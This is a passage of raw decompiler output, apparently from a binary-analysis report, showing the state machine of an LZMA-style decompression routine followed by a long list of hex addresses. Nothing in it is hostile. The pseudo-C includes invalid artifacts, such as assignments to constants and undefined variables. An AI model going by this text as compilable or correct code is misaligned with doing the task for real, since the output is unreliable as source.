                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      													goto L39;
                                                                                                                      												} else {
                                                                                                                      													goto L37;
                                                                                                                      												}
                                                                                                                      											case 0xe:
                                                                                                                      												L46:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t156 = __ebp - 0x70;
                                                                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t156;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												while(1) {
                                                                                                                      													L48:
                                                                                                                      													__eflags = __ebx - 0x100;
                                                                                                                      													if(__ebx >= 0x100) {
                                                                                                                      														break;
                                                                                                                      													}
                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                      													__edx = __ebx + __ebx;
                                                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                                                      													__esi = __edx + __eax;
                                                                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      													__ax =  *__esi;
                                                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                                                      													__edi = __ax & 0x0000ffff;
                                                                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      														__cx = __ax;
                                                                                                                      														__ebx = __edx + 1;
                                                                                                                      														__cx = __ax >> 5;
                                                                                                                      														__eflags = __eax;
                                                                                                                      														 *__esi = __ax;
                                                                                                                      													} else {
                                                                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                                                                      														0x800 = 0x800 - __edi;
                                                                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      														__ebx = __ebx + __ebx;
                                                                                                                      														 *__esi = __cx;
                                                                                                                      													}
                                                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      														continue;
                                                                                                                      													} else {
                                                                                                                      														goto L46;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												L54:
                                                                                                                      												_t173 = __ebp - 0x34;
                                                                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                      												__eflags =  *_t173;
                                                                                                                      												goto L55;
                                                                                                                      											case 0xf:
                                                                                                                      												L58:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t203 = __ebp - 0x70;
                                                                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t203;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												L60:
                                                                                                                      												__eflags = __ebx - 0x100;
                                                                                                                      												if(__ebx >= 0x100) {
                                                                                                                      													L55:
                                                                                                                      													__al =  *(__ebp - 0x44);
                                                                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                      													goto L56;
                                                                                                                      												}
                                                                                                                      												L61:
                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                      												__edx = __ebx + __ebx;
                                                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                                                      												__esi = __edx + __eax;
                                                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      												__ax =  *__esi;
                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													__cx = __ax;
                                                                                                                      													__ebx = __edx + 1;
                                                                                                                      													__cx = __ax >> 5;
                                                                                                                      													__eflags = __eax;
                                                                                                                      													 *__esi = __ax;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                      													 *__esi = __cx;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      													goto L60;
                                                                                                                      												} else {
                                                                                                                      													goto L58;
                                                                                                                      												}
                                                                                                                      											case 0x10:
                                                                                                                      												L109:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0x10;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t365 = __ebp - 0x70;
                                                                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t365;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												goto L111;
                                                                                                                      											case 0x11:
                                                                                                                      												goto L69;
                                                                                                                      											case 0x12:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                      													while(1) {
                                                                                                                      														L132:
                                                                                                                      														 *(_t613 - 0x54) = _t606;
                                                                                                                      														goto L133;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      												__eflags = __eax;
                                                                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                      												goto L130;
                                                                                                                      											case 0x13:
                                                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                                                      													_t469 = __ebp - 0x58;
                                                                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                      													__eflags =  *_t469;
                                                                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                                                                      													 *(__ebp - 0x40) = 8;
                                                                                                                      													L144:
                                                                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                                                                      													goto L145;
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                      												 *(__ebp - 0x30) = 8;
                                                                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                      												L130:
                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                      												 *(__ebp - 0x40) = 3;
                                                                                                                      												goto L144;
                                                                                                                      											case 0x14:
                                                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                      												__eax =  *(__ebp - 0x80);
                                                                                                                      												 *(_t613 - 0x88) = _t533;
                                                                                                                      												goto L1;
                                                                                                                      											case 0x15:
                                                                                                                      												__eax = 0;
                                                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                      												__al = __al & 0x000000fd;
                                                                                                                      												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                      												goto L120;
                                                                                                                      											case 0x16:
                                                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                                                      												__eflags = __eax - 4;
                                                                                                                      												if(__eax >= 4) {
                                                                                                                      													_push(3);
                                                                                                                      													_pop(__eax);
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 4);
                                                                                                                      												 *(__ebp - 0x40) = 6;
                                                                                                                      												__eax = __eax << 7;
                                                                                                                      												 *(__ebp - 0x7c) = 0x19;
                                                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                                                      												goto L145;
                                                                                                                      											case 0x17:
                                                                                                                      												L145:
                                                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                                                      												 *(__ebp - 0x50) = 1;
                                                                                                                      												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                      												goto L149;
                                                                                                                      											case 0x18:
                                                                                                                      												L146:
                                                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0x18;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												_t484 = __ebp - 0x70;
                                                                                                                      												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                      												__eflags =  *_t484;
                                                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                      												L148:
                                                                                                                      												_t487 = __ebp - 0x48;
                                                                                                                      												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                      												__eflags =  *_t487;
                                                                                                                      												L149:
                                                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                                                      													__ecx =  *(__ebp - 0x40);
                                                                                                                      													__ebx =  *(__ebp - 0x50);
                                                                                                                      													0 = 1;
                                                                                                                      													__eax = 1 << __cl;
                                                                                                                      													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                      													__eax =  *(__ebp - 0x7c);
                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                      													while(1) {
                                                                                                                      														 *(_t613 - 0x88) = _t533;
                                                                                                                      														goto L1;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x50);
                                                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                                                      												__esi = __edx + __eax;
                                                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                                                      												__ax =  *__esi;
                                                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                      													__cx = __ax;
                                                                                                                      													__cx = __ax >> 5;
                                                                                                                      													__eax = __eax - __ecx;
                                                                                                                      													__edx = __edx + 1;
                                                                                                                      													__eflags = __edx;
                                                                                                                      													 *__esi = __ax;
                                                                                                                      													 *(__ebp - 0x50) = __edx;
                                                                                                                      												} else {
                                                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                                                      													0x800 = 0x800 - __edi;
                                                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                      													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                      													 *__esi = __cx;
                                                                                                                      												}
                                                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      													goto L148;
                                                                                                                      												} else {
                                                                                                                      													goto L146;
                                                                                                                      												}
                                                                                                                      											case 0x19:
                                                                                                                      												__eflags = __ebx - 4;
                                                                                                                      												if(__ebx < 4) {
                                                                                                                      													 *(__ebp - 0x2c) = __ebx;
                                                                                                                      													L119:
                                                                                                                      													_t393 = __ebp - 0x2c;
                                                                                                                      													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                      													__eflags =  *_t393;
                                                                                                                      													L120:
                                                                                                                      													__eax =  *(__ebp - 0x2c);
                                                                                                                      													__eflags = __eax;
                                                                                                                      													if(__eax == 0) {
                                                                                                                      														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                      														goto L170;
                                                                                                                      													}
                                                                                                                      													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                      													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                      														goto L171;
                                                                                                                      													}
                                                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                      													__eax =  *(__ebp - 0x30);
                                                                                                                      													_t400 = __ebp - 0x60;
                                                                                                                      													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                      													__eflags =  *_t400;
                                                                                                                      													goto L123;
                                                                                                                      												}
                                                                                                                      												__ecx = __ebx;
                                                                                                                      												__eax = __ebx;
                                                                                                                      												__ecx = __ebx >> 1;
                                                                                                                      												__eax = __ebx & 0x00000001;
                                                                                                                      												__ecx = (__ebx >> 1) - 1;
                                                                                                                      												__al = __al | 0x00000002;
                                                                                                                      												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                      												__eflags = __ebx - 0xe;
                                                                                                                      												 *(__ebp - 0x2c) = __eax;
                                                                                                                      												if(__ebx >= 0xe) {
                                                                                                                      													__ebx = 0;
                                                                                                                      													 *(__ebp - 0x48) = __ecx;
                                                                                                                      													L102:
                                                                                                                      													__eflags =  *(__ebp - 0x48);
                                                                                                                      													if( *(__ebp - 0x48) <= 0) {
                                                                                                                      														__eax = __eax + __ebx;
                                                                                                                      														 *(__ebp - 0x40) = 4;
                                                                                                                      														 *(__ebp - 0x2c) = __eax;
                                                                                                                      														__eax =  *(__ebp - 4);
                                                                                                                      														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                      														__eflags = __eax;
                                                                                                                      														L108:
                                                                                                                      														__ebx = 0;
                                                                                                                      														 *(__ebp - 0x58) = __eax;
                                                                                                                      														 *(__ebp - 0x50) = 1;
                                                                                                                      														 *(__ebp - 0x44) = 0;
                                                                                                                      														 *(__ebp - 0x48) = 0;
                                                                                                                      														L112:
                                                                                                                      														__eax =  *(__ebp - 0x40);
                                                                                                                      														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                      														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                      															_t391 = __ebp - 0x2c;
                                                                                                                      															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                      															__eflags =  *_t391;
                                                                                                                      															goto L119;
                                                                                                                      														}
                                                                                                                      														__eax =  *(__ebp - 0x50);
                                                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                      														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                      														__eax =  *(__ebp - 0x58);
                                                                                                                      														__esi = __edi + __eax;
                                                                                                                      														 *(__ebp - 0x54) = __esi;
                                                                                                                      														__ax =  *__esi;
                                                                                                                      														__ecx = __ax & 0x0000ffff;
                                                                                                                      														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                      														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                      														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                      															__ecx = 0;
                                                                                                                      															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                      															__ecx = 1;
                                                                                                                      															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                      															__ebx = 1;
                                                                                                                      															__ecx =  *(__ebp - 0x48);
                                                                                                                      															__ebx = 1 << __cl;
                                                                                                                      															__ecx = 1 << __cl;
                                                                                                                      															__ebx =  *(__ebp - 0x44);
                                                                                                                      															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                      															__cx = __ax;
                                                                                                                      															__cx = __ax >> 5;
                                                                                                                      															__eax = __eax - __ecx;
                                                                                                                      															__edi = __edi + 1;
                                                                                                                      															__eflags = __edi;
                                                                                                                      															 *(__ebp - 0x44) = __ebx;
                                                                                                                      															 *__esi = __ax;
                                                                                                                      															 *(__ebp - 0x50) = __edi;
                                                                                                                      														} else {
                                                                                                                      															 *(__ebp - 0x10) = __edx;
                                                                                                                      															0x800 = 0x800 - __ecx;
                                                                                                                      															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                      															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                      															 *__esi = __dx;
                                                                                                                      														}
                                                                                                                      														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      															L111:
                                                                                                                      															_t368 = __ebp - 0x48;
                                                                                                                      															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                      															__eflags =  *_t368;
                                                                                                                      															goto L112;
                                                                                                                      														} else {
                                                                                                                      															goto L109;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      													__ecx =  *(__ebp - 0xc);
                                                                                                                      													__ebx = __ebx + __ebx;
                                                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                      													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                                                      													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                      														__ecx =  *(__ebp - 0x10);
                                                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                      														__ebx = __ebx | 0x00000001;
                                                                                                                      														__eflags = __ebx;
                                                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                                                      													}
                                                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                      														L101:
                                                                                                                      														_t338 = __ebp - 0x48;
                                                                                                                      														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                      														__eflags =  *_t338;
                                                                                                                      														goto L102;
                                                                                                                      													} else {
                                                                                                                      														goto L99;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												__edx =  *(__ebp - 4);
                                                                                                                      												__eax = __eax - __ebx;
                                                                                                                      												 *(__ebp - 0x40) = __ecx;
                                                                                                                      												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                      												goto L108;
                                                                                                                      											case 0x1a:
                                                                                                                      												L56:
                                                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0x1a;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__ecx =  *(__ebp - 0x68);
                                                                                                                      												__al =  *(__ebp - 0x5c);
                                                                                                                      												__edx =  *(__ebp - 8);
                                                                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                      												 *( *(__ebp - 0x68)) = __al;
                                                                                                                      												__ecx =  *(__ebp - 0x14);
                                                                                                                      												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                      												__eax = __ecx + 1;
                                                                                                                      												__edx = 0;
                                                                                                                      												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                      												__edx = _t192;
                                                                                                                      												goto L80;
                                                                                                                      											case 0x1b:
                                                                                                                      												L76:
                                                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                                                      													 *(__ebp - 0x88) = 0x1b;
                                                                                                                      													goto L170;
                                                                                                                      												}
                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      													__eflags = __eax;
                                                                                                                      												}
                                                                                                                      												__edx =  *(__ebp - 8);
                                                                                                                      												__cl =  *(__eax + __edx);
                                                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                                                                      												 *(__eax + __edx) = __cl;
                                                                                                                      												__eax = __eax + 1;
                                                                                                                      												__edx = 0;
                                                                                                                      												_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                      												__edx = _t275;
                                                                                                                      												__eax =  *(__ebp - 0x68);
                                                                                                                      												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                      												_t284 = __ebp - 0x64;
                                                                                                                      												 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                      												__eflags =  *_t284;
                                                                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                      												L80:
                                                                                                                      												 *(__ebp - 0x14) = __edx;
                                                                                                                      												goto L81;
                                                                                                                      											case 0x1c:
                                                                                                                      												while(1) {
                                                                                                                      													L123:
                                                                                                                      													__eflags =  *(__ebp - 0x64);
                                                                                                                      													if( *(__ebp - 0x64) == 0) {
                                                                                                                      														break;
                                                                                                                      													}
                                                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                      														__eflags = __eax;
                                                                                                                      													}
                                                                                                                      													__edx =  *(__ebp - 8);
                                                                                                                      													__cl =  *(__eax + __edx);
                                                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                                                      													 *(__ebp - 0x5c) = __cl;
                                                                                                                      													 *(__eax + __edx) = __cl;
                                                                                                                      													__eax = __eax + 1;
                                                                                                                      													__edx = 0;
                                                                                                                      													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                      													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                      													__edx = _t414;
                                                                                                                      													__eax =  *(__ebp - 0x68);
                                                                                                                      													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                      													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                      													__eflags =  *(__ebp - 0x30);
                                                                                                                      													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                      													 *(__ebp - 0x14) = _t414;
                                                                                                                      													if( *(__ebp - 0x30) > 0) {
                                                                                                                      														continue;
                                                                                                                      													} else {
                                                                                                                      														L81:
                                                                                                                      														 *(__ebp - 0x88) = 2;
                                                                                                                      														goto L1;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      												 *(__ebp - 0x88) = 0x1c;
                                                                                                                      												goto L170;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									L171:
                                                                                                                      									_t535 = _t534 | 0xffffffff;
                                                                                                                      									goto L172;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L1;
                                                                                                                      				}
                                                                                                                      			}













                                                                                                                      0x00000000
                                                                                                                      0x00406e77
                                                                                                                      0x00406e77
                                                                                                                      0x00406e7b
                                                                                                                      0x00406e88
                                                                                                                      0x00406e92
                                                                                                                      0x00000000
                                                                                                                      0x00406e7d
                                                                                                                      0x00406e7d
                                                                                                                      0x00406eb8
                                                                                                                      0x00406ebb
                                                                                                                      0x00406ebe
                                                                                                                      0x00406ec1
                                                                                                                      0x00406ec1
                                                                                                                      0x00406ec4
                                                                                                                      0x00406ecb
                                                                                                                      0x00406ed0
                                                                                                                      0x00406db1
                                                                                                                      0x00406db4
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00407129
                                                                                                                      0x00407129
                                                                                                                      0x00407129
                                                                                                                      0x0040712f
                                                                                                                      0x00407135
                                                                                                                      0x0040713b
                                                                                                                      0x00407155
                                                                                                                      0x00407158
                                                                                                                      0x0040715e
                                                                                                                      0x00407169
                                                                                                                      0x0040716b
                                                                                                                      0x0040713d
                                                                                                                      0x0040713d
                                                                                                                      0x0040714c
                                                                                                                      0x00407150
                                                                                                                      0x00407150
                                                                                                                      0x00407175
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00407177
                                                                                                                      0x0040717b
                                                                                                                      0x0040732a
                                                                                                                      0x00407340
                                                                                                                      0x00407348
                                                                                                                      0x0040734f
                                                                                                                      0x00407351
                                                                                                                      0x00407358
                                                                                                                      0x0040735c
                                                                                                                      0x0040735c
                                                                                                                      0x00407187
                                                                                                                      0x0040718e
                                                                                                                      0x00407196
                                                                                                                      0x00407199
                                                                                                                      0x0040719c
                                                                                                                      0x0040719c
                                                                                                                      0x004071a2
                                                                                                                      0x004071a2
                                                                                                                      0x0040693e
                                                                                                                      0x0040693e
                                                                                                                      0x0040693e
                                                                                                                      0x00406947
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040694d
                                                                                                                      0x00000000
                                                                                                                      0x00406958
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406961
                                                                                                                      0x00406964
                                                                                                                      0x00406967
                                                                                                                      0x0040696b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406971
                                                                                                                      0x00406974
                                                                                                                      0x00406976
                                                                                                                      0x00406977
                                                                                                                      0x0040697a
                                                                                                                      0x0040697c
                                                                                                                      0x0040697d
                                                                                                                      0x0040697f
                                                                                                                      0x00406982
                                                                                                                      0x00406987
                                                                                                                      0x0040698c
                                                                                                                      0x00406995
                                                                                                                      0x004069a8
                                                                                                                      0x004069ab
                                                                                                                      0x004069b7
                                                                                                                      0x004069df
                                                                                                                      0x004069e1
                                                                                                                      0x004069ef
                                                                                                                      0x004069ef
                                                                                                                      0x004069f3
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
